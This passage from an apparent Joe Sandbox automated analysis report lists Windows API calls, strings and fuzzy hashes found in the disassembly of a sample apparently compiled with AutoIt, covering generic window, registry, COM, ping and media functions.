                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0076EA5D
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0076EA73
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0076EA84
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0076EA96
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0076EAA7
                          Similarity
                          • API ID: SendString$_wcslen
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2420728520-1007645807
                          • Opcode ID: 32bf0528ca0399e1d5f956f3973705c83eaf41e506e144a62041ca8bfbc1a601
                          • Instruction ID: 1b06f77cd8ed26d46f3f078b746994d8739d41fab34daca6f82c9fbfe2a82369
                          • Opcode Fuzzy Hash: 32bf0528ca0399e1d5f956f3973705c83eaf41e506e144a62041ca8bfbc1a601
                          • Instruction Fuzzy Hash: 3711C6B5A50219B9D720A7A5DD8AEFF6BBCEFD1F00F00452D7801A20D1EE785D05C6B0
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00765CE2
                          • GetWindowRect.USER32(00000000,?), ref: 00765CFB
                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00765D59
                          • GetDlgItem.USER32(?,00000002), ref: 00765D69
                          • GetWindowRect.USER32(00000000,?), ref: 00765D7B
                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00765DCF
                          • GetDlgItem.USER32(?,000003E9), ref: 00765DDD
                          • GetWindowRect.USER32(00000000,?), ref: 00765DEF
                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00765E31
                          • GetDlgItem.USER32(?,000003EA), ref: 00765E44
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00765E5A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00765E67
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 4babd95a4254937885d0274ba4a16721c15a5c8cb2758d631b0cef12ea9c3588
                          • Instruction ID: a622660c45ede114d2f34288fe987b44184b74b92518ee6c3db82a36740186a3
                          • Opcode Fuzzy Hash: 4babd95a4254937885d0274ba4a16721c15a5c8cb2758d631b0cef12ea9c3588
                          • Instruction Fuzzy Hash: F8511171B00605AFDF19CF68DD89AAE7BB5FB48300F548229F916E7290D7749E01CB60
                          APIs
                            • Part of subcall function 00718F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00718BE8,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718FC5
                          • DestroyWindow.USER32(?), ref: 00718C81
                          • KillTimer.USER32(00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718D1B
                          • DestroyAcceleratorTable.USER32(00000000), ref: 00756973
                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 007569A1
                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 007569B8
                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00718BBA,00000000), ref: 007569D4
                          • DeleteObject.GDI32(00000000), ref: 007569E6
                          Similarity
                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 641708696-0
                          • Opcode ID: fa1c54e7f7c7c4b438f07043b6adebd4f5a2d5bb6cab5ee3239166efe93bf043
                          • Instruction ID: 926795d4334a65c4c65f857a64f03dc7c57b55b70759ba9c91666d7b05c07324
                          • Opcode Fuzzy Hash: fa1c54e7f7c7c4b438f07043b6adebd4f5a2d5bb6cab5ee3239166efe93bf043
                          • Instruction Fuzzy Hash: F661AC30502600EFCB629F18D958BA577F2FB40312F94855EE4429B5A0CB7DB9C5CFAA
                          APIs
                            • Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952
                          • GetSysColor.USER32(0000000F), ref: 00719862
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: 62a85e8faff2c4f906e914aa6e2971783f75e286a672e360a4f6bd711bf613a0
                          • Instruction ID: 24f4d7fbb394ccaee313e8a51af656b71843643a6e8db4cefef2649b63a624ea
                          • Opcode Fuzzy Hash: 62a85e8faff2c4f906e914aa6e2971783f75e286a672e360a4f6bd711bf613a0
                          • Instruction Fuzzy Hash: 0D419E31104644AFDF219B3C9C98BF93BA5AB46321F148606FAA28B1E1D6789C83DB14
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0074F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00769717
                          • LoadStringW.USER32(00000000,?,0074F7F8,00000001), ref: 00769720
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0074F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00769742
                          • LoadStringW.USER32(00000000,?,0074F7F8,00000001), ref: 00769745
                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00769866
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wcslen
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 747408836-2268648507
                          • Opcode ID: 3e00327f07c80c5ccbaebca368b18985bd0f12d7fee9d70bbb906dd3e221266f
                          • Instruction ID: 26db274c84819ea8eb4ccda4237c5c9c7596fd87550abecee272c4af6ba117c7
                          • Opcode Fuzzy Hash: 3e00327f07c80c5ccbaebca368b18985bd0f12d7fee9d70bbb906dd3e221266f
                          • Instruction Fuzzy Hash: D8412072800209EADF05EBE0DD8ADEEB7BCAF55340F504165F606720D2EA396F49CB61
                          APIs
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007607A2
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007607BE
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007607DA
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00760804
                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0076082C
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00760837
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0076083C
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 323675364-22481851
                          • Opcode ID: ed1a45b6b3e988da6ed056bc5b381f28615700eb3d8c536e5c8b7d052a299914
                          • Instruction ID: 23cc874d35b3c49e411c822c83072b33a7bd24aa61e1ec7bd50991b0f9a792e4
                          • Opcode Fuzzy Hash: ed1a45b6b3e988da6ed056bc5b381f28615700eb3d8c536e5c8b7d052a299914
                          • Instruction Fuzzy Hash: 19410B71C10229EBDF15EB94DC99DEEB7B8FF04350F144269E905A31A1EB386E44CB90
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00783C5C
                          • CoInitialize.OLE32(00000000), ref: 00783C8A
                          • CoUninitialize.OLE32 ref: 00783C94
                          • _wcslen.LIBCMT ref: 00783D2D
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00783DB1
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00783ED5
                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00783F0E
                          • CoGetObject.OLE32(?,00000000,0079FB98,?), ref: 00783F2D
                          • SetErrorMode.KERNEL32(00000000), ref: 00783F40
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00783FC4
                          • VariantClear.OLEAUT32(?), ref: 00783FD8
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                          • String ID:
                          • API String ID: 429561992-0
                          • Opcode ID: 4089a738dba264a7b29e23a4d86ee9617e83799a9085c9141c79672babe73d5a
                          • Instruction ID: 7d4fda29b5a8c922baa35e0005afab68f118c7d9333ecde121f3a3ecb6a2ee4c
                          • Opcode Fuzzy Hash: 4089a738dba264a7b29e23a4d86ee9617e83799a9085c9141c79672babe73d5a
                          • Instruction Fuzzy Hash: 23C13771608205DFD700EF68C88492BB7E9FF89B44F04491DF98A9B251D735ED45CBA2
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00777AF3
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00777B8F
                          • SHGetDesktopFolder.SHELL32(?), ref: 00777BA3
                          • CoCreateInstance.OLE32(0079FD08,00000000,00000001,007C6E6C,?), ref: 00777BEF
                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00777C74
                          • CoTaskMemFree.OLE32(?,?), ref: 00777CCC
                          • SHBrowseForFolderW.SHELL32(?), ref: 00777D57
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00777D7A
                          • CoTaskMemFree.OLE32(00000000), ref: 00777D81
                          • CoTaskMemFree.OLE32(00000000), ref: 00777DD6
                          • CoUninitialize.OLE32 ref: 00777DDC
                          Similarity
                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                          • String ID:
                          • API String ID: 2762341140-0
                          • Opcode ID: b02302d6b764dcdb4d356eba8aea40f541ee38c0acb65b518e12adad43defcba
                          • Instruction ID: c51e37ae4893015bcfce43af7bdb4f0a4c68132548d98a9c574775d09573e6dd
                          • Opcode Fuzzy Hash: b02302d6b764dcdb4d356eba8aea40f541ee38c0acb65b518e12adad43defcba
                          • Instruction Fuzzy Hash: 14C12A75A04209EFCB14DFA4C888DAEBBF9FF48344B148599E9199B361D734EE41CB90
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00795504
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00795515
                          • CharNextW.USER32(00000158), ref: 00795544
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00795585
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0079559B
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007955AC
                          Similarity
                          • API ID: MessageSend$CharNext
                          • String ID:
                          • API String ID: 1350042424-0
                          • Opcode ID: 68ea269d902d24f615f543aee97d011c6e18d5bec857ff8bb2e6e45e73e2c8c6
                          • Instruction ID: d4144efd9e7754c10866397a45ce64137bdc712764165a7a55448511115bbeaf
                          • Opcode Fuzzy Hash: 68ea269d902d24f615f543aee97d011c6e18d5bec857ff8bb2e6e45e73e2c8c6
                          • Instruction Fuzzy Hash: 44619F71900628EFDF12DF94EC84DFE7BB9EB05720F108145F925AB2A1D7789A81DB60
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0075FAAF
                          • SafeArrayAllocData.OLEAUT32(?), ref: 0075FB08
                          • VariantInit.OLEAUT32(?), ref: 0075FB1A
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0075FB3A
                          • VariantCopy.OLEAUT32(?,?), ref: 0075FB8D
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0075FBA1
                          • VariantClear.OLEAUT32(?), ref: 0075FBB6
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0075FBC3
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075FBCC
                          • VariantClear.OLEAUT32(?), ref: 0075FBDE
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075FBE9
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 95dc87925049094b18675cbea33ec587eff0c8d4c60b2093b031b6ea3a7c8405
                          • Instruction ID: 7b22d9331cd46bdef6464ca02f061898f1227d8cee1339765ff1f5849b513e95
                          • Opcode Fuzzy Hash: 95dc87925049094b18675cbea33ec587eff0c8d4c60b2093b031b6ea3a7c8405
                          • Instruction Fuzzy Hash: 43415F75A00219DFCF01DF68C8589EEBBB9EF08355F00C069E905A7261CB78A946CFA1
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00769CA1
                          • GetAsyncKeyState.USER32(000000A0), ref: 00769D22
                          • GetKeyState.USER32(000000A0), ref: 00769D3D
                          • GetAsyncKeyState.USER32(000000A1), ref: 00769D57
                          • GetKeyState.USER32(000000A1), ref: 00769D6C
                          • GetAsyncKeyState.USER32(00000011), ref: 00769D84
                          • GetKeyState.USER32(00000011), ref: 00769D96
                          • GetAsyncKeyState.USER32(00000012), ref: 00769DAE
                          • GetKeyState.USER32(00000012), ref: 00769DC0
                          • GetAsyncKeyState.USER32(0000005B), ref: 00769DD8
                          • GetKeyState.USER32(0000005B), ref: 00769DEA
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 2474b1afed8430ab411974f4441de308d9e8c9537f3633646d3a5a1165687641
                          • Instruction ID: f5d31bc046defc056a1d08f4199f3254063977160d47fb6757a94daa01873af4
                          • Opcode Fuzzy Hash: 2474b1afed8430ab411974f4441de308d9e8c9537f3633646d3a5a1165687641
                          • Instruction Fuzzy Hash: 204195346047C969FF71977488043B5BEA86F11344F08806ADFC7566C2EBBD99D8CBA2
                          APIs
                          • WSAStartup.WSOCK32(00000101,?), ref: 007805BC
                          • inet_addr.WSOCK32(?), ref: 0078061C
                          • gethostbyname.WSOCK32(?), ref: 00780628
                          • IcmpCreateFile.IPHLPAPI ref: 00780636
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007806C6
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007806E5
                          • IcmpCloseHandle.IPHLPAPI(?), ref: 007807B9
                          • WSACleanup.WSOCK32 ref: 007807BF
                          Strings
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 70c9992d6b9baaf002146358d7fef9af833cc4a4451aae9aba7563052ffc7837
                          • Instruction ID: c7a0120e5cebd1424a696a18a00c80bfd8b2ee7e3287fa9833a82ae6be5769b3
                          • Opcode Fuzzy Hash: 70c9992d6b9baaf002146358d7fef9af833cc4a4451aae9aba7563052ffc7837
                          • Instruction Fuzzy Hash: 5091AE75648201DFDB60EF15C889F1ABBE0AF44318F1485A9F4698B6A2C738ED49CFD1
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcslen$BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 707087890-567219261
                          • Opcode ID: 6e7f4e3f98b52cc2fec2fb17fabca3b23e0559a9d9a376771a261ab2a4af6484
                          • Instruction ID: 1dfddc807f1dc8bcfcdcad7b18fb241a28fc89db6771fe7d7b6bea0a02011201
                          • Opcode Fuzzy Hash: 6e7f4e3f98b52cc2fec2fb17fabca3b23e0559a9d9a376771a261ab2a4af6484
                          • Instruction Fuzzy Hash: D551A131A40116DBCF54EF6CC9409BEB7A5BF64320BA04229E966E72C5DF39ED40C791
                          APIs
                          • CoInitialize.OLE32 ref: 00783774
                          • CoUninitialize.OLE32 ref: 0078377F
                          • CoCreateInstance.OLE32(?,00000000,00000017,0079FB78,?), ref: 007837D9
                          • IIDFromString.OLE32(?,?), ref: 0078384C
                          • VariantInit.OLEAUT32(?), ref: 007838E4
                          • VariantClear.OLEAUT32(?), ref: 00783936
                          Strings
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 636576611-1287834457
                          • Opcode ID: b331df95cb5817dd269c28a511193ec5ce7169e118a4304207153408085c9f50
                          • Instruction ID: 7770f843ac728c275ff6a0ce26a828f0fab50d5040a1416f170152c740f895f9
                          • Opcode Fuzzy Hash: b331df95cb5817dd269c28a511193ec5ce7169e118a4304207153408085c9f50
                          • Instruction Fuzzy Hash: 2561AFB0648301EFD711EF58C889F5AB7E4AF48B14F00490DF9859B291C778EE49CBA2
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                            • Part of subcall function 0071912D: GetCursorPos.USER32(?), ref: 00719141
                            • Part of subcall function 0071912D: ScreenToClient.USER32(00000000,?), ref: 0071915E
                            • Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000001), ref: 00719183
                            • Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000002), ref: 0071919D
                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00798B6B
                          • ImageList_EndDrag.COMCTL32 ref: 00798B71
                          • ReleaseCapture.USER32 ref: 00798B77
                          • SetWindowTextW.USER32(?,00000000), ref: 00798C12
                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00798C25
                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00798CFF
                          Strings
                          Similarity
                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#}
                          • API String ID: 1924731296-1379082668
                          • Opcode ID: 771a4dd482f0806e58b9cfa0b57f749637a14222cb93a067d31ab047d7ff20ff
                          • Instruction ID: f1e2cf150c3f1dbbbdace53b19adc09c16bddf6dd5f01135b7706758e2bea850
                          • Opcode Fuzzy Hash: 771a4dd482f0806e58b9cfa0b57f749637a14222cb93a067d31ab047d7ff20ff
                          • Instruction Fuzzy Hash: C7518A71105240EFDB04DF24D86AFAA77E4BB89710F40066EF952572E2CB78A945CB62
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007733CF
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007733F0
                          Strings
                          Similarity
                          • API ID: LoadString$_wcslen
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                          • API String ID: 4099089115-3080491070
                          • Opcode ID: 793f70bca7254a21e338416a88a1f8aba05ba68bc58b5b07346ec15886699b8d
                          • Instruction ID: aa51ea5d01d598275fa91dea30586a66d44d85e1edf511e47c8c8d3dc850a316
                          • Opcode Fuzzy Hash: 793f70bca7254a21e338416a88a1f8aba05ba68bc58b5b07346ec15886699b8d
                          • Instruction Fuzzy Hash: 8B5171B1900209FADF15EBA0CD4AEEEB7B8AF04340F508165F50972092EB3D6F58DB60
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                          • API String ID: 1256254125-769500911
                          • Opcode ID: e8216b14bb635e1dc2f6943b70f9067b20c48e4fce588913460aab460b248a9d
                          • Instruction ID: 9111635bd56c85edba8e26b66429aa0cd1fe4117225a41069758eb6e418004d3
                          • Opcode Fuzzy Hash: e8216b14bb635e1dc2f6943b70f9067b20c48e4fce588913460aab460b248a9d
                          • Instruction Fuzzy Hash: 8B41D832A00126DBCB105F7DC9905BE77A5AFA2754B24422AEC63D7284E739DDC1C790
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 007753A0
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00775416
                          • GetLastError.KERNEL32 ref: 00775420
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 007754A7
                          Strings
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 8be2f8123a43640b06fe00de86a36e6f59a33095f815925aeedad927aee3767b
                          • Instruction ID: af0864432465c63b1930fb141332c55fa70db03dbd663425b4af44c4609245f5
                          • Opcode Fuzzy Hash: 8be2f8123a43640b06fe00de86a36e6f59a33095f815925aeedad927aee3767b
                          • Instruction Fuzzy Hash: 9D319075A00544DFDF10DF68C488EAA7BB4EF05345F14C169E50ACB292DBB9DD82CBA1
                          APIs
                          • CreateMenu.USER32 ref: 00793C79
                          • SetMenu.USER32(?,00000000), ref: 00793C88
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00793D10
                          • IsMenu.USER32(?), ref: 00793D24
                          • CreatePopupMenu.USER32 ref: 00793D2E
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00793D5B
                          • DrawMenuBar.USER32 ref: 00793D63
                          Strings
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                          • String ID: 0$F
                          • API String ID: 161812096-3044882817
                          • Opcode ID: 2e576dcd6a6ef02a3599bb5f3eeae7fd9af68f667e8f6314f9a407212d6858a6
                          • Instruction ID: 6ae320447d9ef1072051239ab43df6cf57631a2721b709882c81d3eea7a100a6
                          • Opcode Fuzzy Hash: 2e576dcd6a6ef02a3599bb5f3eeae7fd9af68f667e8f6314f9a407212d6858a6
                          • Instruction Fuzzy Hash: 77419CB4A01209EFDF14CFA4E854EAA7BB5FF49300F144029F90697360D738AA10CF94
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00793A9D
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00793AA0
                          • GetWindowLongW.USER32(?,000000F0), ref: 00793AC7
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00793AEA
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00793B62
                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00793BAC
                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00793BC7
                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00793BE2
                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00793BF6
                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00793C13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow
                          • String ID:
                          • API String ID: 312131281-0
                          • Opcode ID: 566b7a95fa08955db2acb50a9dd4abbe4b255811645e043bec83866e39ae4851
                          • Instruction ID: 91c06b7cbcb218dbfac336c2110ec729cd2bfb0a0c16ef55cdce3c44152e9bfa
                          • Opcode Fuzzy Hash: 566b7a95fa08955db2acb50a9dd4abbe4b255811645e043bec83866e39ae4851
                          • Instruction Fuzzy Hash: 33618D75900248AFDF10DFA8DC81EEE77F8EB09700F10419AFA15A7292C778AE41DB60
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0076B151
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B165
                          • GetWindowThreadProcessId.USER32(00000000), ref: 0076B16C
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B17B
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0076B18D
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1A6
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1B8
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1FD
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B212
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B21D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 371782bd641f54103b84ba9e6acc29c49b564ad6edcc7e8ee583bdee30cdffb7
                          • Instruction ID: 0662687e7550a396188cc2f0d647ab8ca77797f13559ba8da457446941a4c448
                          • Opcode Fuzzy Hash: 371782bd641f54103b84ba9e6acc29c49b564ad6edcc7e8ee583bdee30cdffb7
                          • Instruction Fuzzy Hash: 4F319171500204BFDF129F64DC59B6E7BBABB52311F10C016FE02EA290D7BC9A818F69
                          APIs
                          • _free.LIBCMT ref: 00732C94
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 00732CA0
                          • _free.LIBCMT ref: 00732CAB
                          • _free.LIBCMT ref: 00732CB6
                          • _free.LIBCMT ref: 00732CC1
                          • _free.LIBCMT ref: 00732CCC
                          • _free.LIBCMT ref: 00732CD7
                          • _free.LIBCMT ref: 00732CE2
                          • _free.LIBCMT ref: 00732CED
                          • _free.LIBCMT ref: 00732CFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: b9040cbd97578d59a99ac14f30609361fca46113580b29f45fc5f6077a414f31
                          • Instruction ID: 9a37e9b23c3debd017c13d47da197dcb7c683ce73eb933043494eb1eb32587ed
                          • Opcode Fuzzy Hash: b9040cbd97578d59a99ac14f30609361fca46113580b29f45fc5f6077a414f31
                          • Instruction Fuzzy Hash: 0811B276100118EFEB02EF54E886DDD3BA5BF05350F9144A0FA88AB233DA35FA519F90
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00701459
                          • OleUninitialize.OLE32(?,00000000), ref: 007014F8
                          • UnregisterHotKey.USER32(?), ref: 007016DD
                          • DestroyWindow.USER32(?), ref: 007424B9
                          • FreeLibrary.KERNEL32(?), ref: 0074251E
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0074254B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
